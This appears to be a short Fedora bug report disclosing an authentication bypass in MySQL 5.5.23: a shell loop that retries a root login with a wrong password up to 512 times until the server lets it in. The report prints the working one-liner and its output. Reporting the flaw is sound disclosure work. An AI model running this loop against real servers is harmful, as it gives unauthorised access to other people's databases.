Description of problem: Any user without MySQL username/password is able to query and update databases with a hack that has recently been posted online: Version-Release number of selected component (if applicable): sh-4.2$ rpm -qa | grep -i mysql mysql-connector-odbc-5.1.10-1.fc17.x86_64 mysql-5.5.23-1.fc17.x86_64 mysql-libs-5.5.23-1.fc17.x86_64 perl-DBD-MySQL-4.020-2.fc17.x86_64 mysql-workbench-5.2.40-1.fc17.x86_64 mysql-utilities-1.0.5-2.fc17.noarch php-mysql-5.4.3-1.fc17.x86_64 mysql-server-5.5.23-1.fc17.x86_64 mysql-connector-python-0.3.2-3.fc17.noarch sh-4.2$ uname -a Linux wombat 3.3.7-1.fc17.x86_64 #1 SMP Mon May 21 22:32:19 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux sh-4.2$ How reproducible: Steps to Reproduce: 1. Open terminal 2. for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done 3. Actual results: sh-4.2$ for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done @@version 5.5.23 sh-4.2$ Expected results: ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO) Additional info:
*** This bug has been marked as a duplicate of bug 830680 ***